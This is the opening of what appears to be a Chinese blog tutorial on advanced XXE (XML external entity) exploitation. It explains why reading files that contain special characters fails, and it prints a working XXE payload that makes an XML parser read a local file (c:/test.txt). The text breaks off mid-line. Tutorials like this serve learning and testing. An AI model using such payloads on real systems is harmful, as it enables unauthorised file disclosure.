![b91eab26b57f1461adaaaa7ccf90505b.png](https://i-blog.csdnimg.cn/blog_migrate/9ef88f6c28c7f75e5ac537af30f11f58.jpeg)
在XXE漏洞的详细原理解释和利用中,XXE的基本原理还有简单的文件读取利用方式我们已经有了基本的了解,那么接下来就带来我们的XXE漏洞详解——进阶篇!
xxe漏洞利用在实战中往往会遇到很多的问题,也需要更多种多样的利用方式和技巧,本片就给大家一一介绍~
读取文件时有特殊符号
在读取文件时,文件中包含"<,>,&"等这些特殊符号时,会被xml解析器解析,报错从而导致读取失败,例如尝试读取以下文件
C:test.txt
内容:
<Baize Sec>
payload:
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE creds [<!ENTITY xxe SYSTEM "file:///c:/test.txt">]>
<creds>&xxe;</creds>
</